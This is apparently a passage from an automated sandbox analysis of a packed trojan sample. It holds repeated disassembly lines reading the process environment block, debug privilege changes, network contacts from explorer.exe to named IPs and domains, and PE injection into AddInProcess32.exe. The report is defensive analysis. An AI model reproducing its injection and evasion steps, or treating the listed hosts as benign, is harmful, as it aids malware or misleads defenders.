          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01884015 mov eax, dword ptr fs:[00000030h]11_2_01884015
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01884015 mov eax, dword ptr fs:[00000030h]11_2_01884015
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EF0BF mov ecx, dword ptr fs:[00000030h]11_2_017EF0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EF0BF mov eax, dword ptr fs:[00000030h]11_2_017EF0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EF0BF mov eax, dword ptr fs:[00000030h]11_2_017EF0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F90AF mov eax, dword ptr fs:[00000030h]11_2_017F90AF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]11_2_017E20A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]11_2_017E20A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]11_2_017E20A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]11_2_017E20A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]11_2_017E20A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E20A0 mov eax, dword ptr fs:[00000030h]11_2_017E20A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01872073 mov eax, dword ptr fs:[00000030h]11_2_01872073
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B9080 mov eax, dword ptr fs:[00000030h]11_2_017B9080
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01881074 mov eax, dword ptr fs:[00000030h]11_2_01881074
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E3B7A mov eax, dword ptr fs:[00000030h]11_2_017E3B7A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E3B7A mov eax, dword ptr fs:[00000030h]11_2_017E3B7A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0186D380 mov ecx, dword ptr fs:[00000030h]11_2_0186D380
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0187138A mov eax, dword ptr fs:[00000030h]11_2_0187138A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017BDB60 mov ecx, dword ptr fs:[00000030h]11_2_017BDB60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017BF358 mov eax, dword ptr fs:[00000030h]11_2_017BF358
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01885BA5 mov eax, dword ptr fs:[00000030h]11_2_01885BA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017BDB40 mov eax, dword ptr fs:[00000030h]11_2_017BDB40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_018353CA mov eax, dword ptr fs:[00000030h]11_2_018353CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_018353CA mov eax, dword ptr fs:[00000030h]11_2_018353CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DDBE9 mov eax, dword ptr fs:[00000030h]11_2_017DDBE9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0187131B mov eax, dword ptr fs:[00000030h]11_2_0187131B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]11_2_017E03E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]11_2_017E03E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]11_2_017E03E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]11_2_017E03E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]11_2_017E03E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E03E2 mov eax, dword ptr fs:[00000030h]11_2_017E03E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01888B58 mov eax, dword ptr fs:[00000030h]11_2_01888B58
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E4BAD mov eax, dword ptr fs:[00000030h]11_2_017E4BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E4BAD mov eax, dword ptr fs:[00000030h]11_2_017E4BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E4BAD mov eax, dword ptr fs:[00000030h]11_2_017E4BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E2397 mov eax, dword ptr fs:[00000030h]11_2_017E2397
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EB390 mov eax, dword ptr fs:[00000030h]11_2_017EB390
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C1B8F mov eax, dword ptr fs:[00000030h]11_2_017C1B8F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C1B8F mov eax, dword ptr fs:[00000030h]11_2_017C1B8F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F927A mov eax, dword ptr fs:[00000030h]11_2_017F927A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B9240 mov eax, dword ptr fs:[00000030h]11_2_017B9240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B9240 mov eax, dword ptr fs:[00000030h]11_2_017B9240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B9240 mov eax, dword ptr fs:[00000030h]11_2_017B9240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B9240 mov eax, dword ptr fs:[00000030h]11_2_017B9240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F4A2C mov eax, dword ptr fs:[00000030h]11_2_017F4A2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F4A2C mov eax, dword ptr fs:[00000030h]11_2_017F4A2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]11_2_017DA229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]11_2_017DA229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]11_2_017DA229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]11_2_017DA229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]11_2_017DA229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]11_2_017DA229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]11_2_017DA229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]11_2_017DA229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DA229 mov eax, dword ptr fs:[00000030h]11_2_017DA229
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017D3A1C mov eax, dword ptr fs:[00000030h]11_2_017D3A1C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B5210 mov eax, dword ptr fs:[00000030h]11_2_017B5210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B5210 mov ecx, dword ptr fs:[00000030h]11_2_017B5210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B5210 mov eax, dword ptr fs:[00000030h]11_2_017B5210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B5210 mov eax, dword ptr fs:[00000030h]11_2_017B5210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017BAA16 mov eax, dword ptr fs:[00000030h]11_2_017BAA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017BAA16 mov eax, dword ptr fs:[00000030h]11_2_017BAA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C8A0A mov eax, dword ptr fs:[00000030h]11_2_017C8A0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0187AA16 mov eax, dword ptr fs:[00000030h]11_2_0187AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0187AA16 mov eax, dword ptr fs:[00000030h]11_2_0187AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E2AE4 mov eax, dword ptr fs:[00000030h]11_2_017E2AE4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E2ACB mov eax, dword ptr fs:[00000030h]11_2_017E2ACB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017CAAB0 mov eax, dword ptr fs:[00000030h]11_2_017CAAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017CAAB0 mov eax, dword ptr fs:[00000030h]11_2_017CAAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EFAB0 mov eax, dword ptr fs:[00000030h]11_2_017EFAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0187EA55 mov eax, dword ptr fs:[00000030h]11_2_0187EA55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01844257 mov eax, dword ptr fs:[00000030h]11_2_01844257
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B52A5 mov eax, dword ptr fs:[00000030h]11_2_017B52A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B52A5 mov eax, dword ptr fs:[00000030h]11_2_017B52A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B52A5 mov eax, dword ptr fs:[00000030h]11_2_017B52A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B52A5 mov eax, dword ptr fs:[00000030h]11_2_017B52A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B52A5 mov eax, dword ptr fs:[00000030h]11_2_017B52A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0186B260 mov eax, dword ptr fs:[00000030h]11_2_0186B260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0186B260 mov eax, dword ptr fs:[00000030h]11_2_0186B260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017ED294 mov eax, dword ptr fs:[00000030h]11_2_017ED294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017ED294 mov eax, dword ptr fs:[00000030h]11_2_017ED294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01888A62 mov eax, dword ptr fs:[00000030h]11_2_01888A62
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DC577 mov eax, dword ptr fs:[00000030h]11_2_017DC577
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DC577 mov eax, dword ptr fs:[00000030h]11_2_017DC577
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_018805AC mov eax, dword ptr fs:[00000030h]11_2_018805AC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_018805AC mov eax, dword ptr fs:[00000030h]11_2_018805AC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017D7D50 mov eax, dword ptr fs:[00000030h]11_2_017D7D50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F3D43 mov eax, dword ptr fs:[00000030h]11_2_017F3D43
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E4D3B mov eax, dword ptr fs:[00000030h]11_2_017E4D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E4D3B mov eax, dword ptr fs:[00000030h]11_2_017E4D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E4D3B mov eax, dword ptr fs:[00000030h]11_2_017E4D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C3D34 mov eax, dword ptr fs:[00000030h]11_2_017C3D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836DC9 mov eax, dword ptr fs:[00000030h]11_2_01836DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836DC9 mov eax, dword ptr fs:[00000030h]11_2_01836DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836DC9 mov eax, dword ptr fs:[00000030h]11_2_01836DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836DC9 mov ecx, dword ptr fs:[00000030h]11_2_01836DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836DC9 mov eax, dword ptr fs:[00000030h]11_2_01836DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836DC9 mov eax, dword ptr fs:[00000030h]11_2_01836DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017BAD30 mov eax, dword ptr fs:[00000030h]11_2_017BAD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0187FDE2 mov eax, dword ptr fs:[00000030h]11_2_0187FDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0187FDE2 mov eax, dword ptr fs:[00000030h]11_2_0187FDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0187FDE2 mov eax, dword ptr fs:[00000030h]11_2_0187FDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0187FDE2 mov eax, dword ptr fs:[00000030h]11_2_0187FDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01868DF1 mov eax, dword ptr fs:[00000030h]11_2_01868DF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017CD5E0 mov eax, dword ptr fs:[00000030h]11_2_017CD5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017CD5E0 mov eax, dword ptr fs:[00000030h]11_2_017CD5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0183A537 mov eax, dword ptr fs:[00000030h]11_2_0183A537
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01888D34 mov eax, dword ptr fs:[00000030h]11_2_01888D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0187E539 mov eax, dword ptr fs:[00000030h]11_2_0187E539
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01833540 mov eax, dword ptr fs:[00000030h]11_2_01833540
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01863D40 mov eax, dword ptr fs:[00000030h]11_2_01863D40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E1DB5 mov eax, dword ptr fs:[00000030h]11_2_017E1DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E1DB5 mov eax, dword ptr fs:[00000030h]11_2_017E1DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E1DB5 mov eax, dword ptr fs:[00000030h]11_2_017E1DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E35A1 mov eax, dword ptr fs:[00000030h]11_2_017E35A1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EFD9B mov eax, dword ptr fs:[00000030h]11_2_017EFD9B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EFD9B mov eax, dword ptr fs:[00000030h]11_2_017EFD9B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B2D8A mov eax, dword ptr fs:[00000030h]11_2_017B2D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B2D8A mov eax, dword ptr fs:[00000030h]11_2_017B2D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B2D8A mov eax, dword ptr fs:[00000030h]11_2_017B2D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B2D8A mov eax, dword ptr fs:[00000030h]11_2_017B2D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B2D8A mov eax, dword ptr fs:[00000030h]11_2_017B2D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E2581 mov eax, dword ptr fs:[00000030h]11_2_017E2581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E2581 mov eax, dword ptr fs:[00000030h]11_2_017E2581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E2581 mov eax, dword ptr fs:[00000030h]11_2_017E2581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E2581 mov eax, dword ptr fs:[00000030h]11_2_017E2581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017D746D mov eax, dword ptr fs:[00000030h]11_2_017D746D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EA44B mov eax, dword ptr fs:[00000030h]11_2_017EA44B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EBC2C mov eax, dword ptr fs:[00000030h]11_2_017EBC2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01888CD6 mov eax, dword ptr fs:[00000030h]11_2_01888CD6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836CF0 mov eax, dword ptr fs:[00000030h]11_2_01836CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836CF0 mov eax, dword ptr fs:[00000030h]11_2_01836CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836CF0 mov eax, dword ptr fs:[00000030h]11_2_01836CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_018714FB mov eax, dword ptr fs:[00000030h]11_2_018714FB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01871C06 mov eax, dword ptr fs:[00000030h]11_2_01871C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0188740D mov eax, dword ptr fs:[00000030h]11_2_0188740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0188740D mov eax, dword ptr fs:[00000030h]11_2_0188740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0188740D mov eax, dword ptr fs:[00000030h]11_2_0188740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836C0A mov eax, dword ptr fs:[00000030h]11_2_01836C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836C0A mov eax, dword ptr fs:[00000030h]11_2_01836C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836C0A mov eax, dword ptr fs:[00000030h]11_2_01836C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01836C0A mov eax, dword ptr fs:[00000030h]11_2_01836C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0184C450 mov eax, dword ptr fs:[00000030h]11_2_0184C450
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0184C450 mov eax, dword ptr fs:[00000030h]11_2_0184C450
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017C849B mov eax, dword ptr fs:[00000030h]11_2_017C849B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01837794 mov eax, dword ptr fs:[00000030h]11_2_01837794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01837794 mov eax, dword ptr fs:[00000030h]11_2_01837794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01837794 mov eax, dword ptr fs:[00000030h]11_2_01837794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017CFF60 mov eax, dword ptr fs:[00000030h]11_2_017CFF60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017CEF40 mov eax, dword ptr fs:[00000030h]11_2_017CEF40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EE730 mov eax, dword ptr fs:[00000030h]11_2_017EE730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B4F2E mov eax, dword ptr fs:[00000030h]11_2_017B4F2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B4F2E mov eax, dword ptr fs:[00000030h]11_2_017B4F2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DF716 mov eax, dword ptr fs:[00000030h]11_2_017DF716
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EA70E mov eax, dword ptr fs:[00000030h]11_2_017EA70E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EA70E mov eax, dword ptr fs:[00000030h]11_2_017EA70E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0188070D mov eax, dword ptr fs:[00000030h]11_2_0188070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0188070D mov eax, dword ptr fs:[00000030h]11_2_0188070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017F37F5 mov eax, dword ptr fs:[00000030h]11_2_017F37F5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0184FF10 mov eax, dword ptr fs:[00000030h]11_2_0184FF10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0184FF10 mov eax, dword ptr fs:[00000030h]11_2_0184FF10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Network Connect: 13.59.53.244 80
          Source: C:\Windows\explorer.exe; Domain query: www.granthamrobotics.com
          Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe; Domain query: www.mclpay.com
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
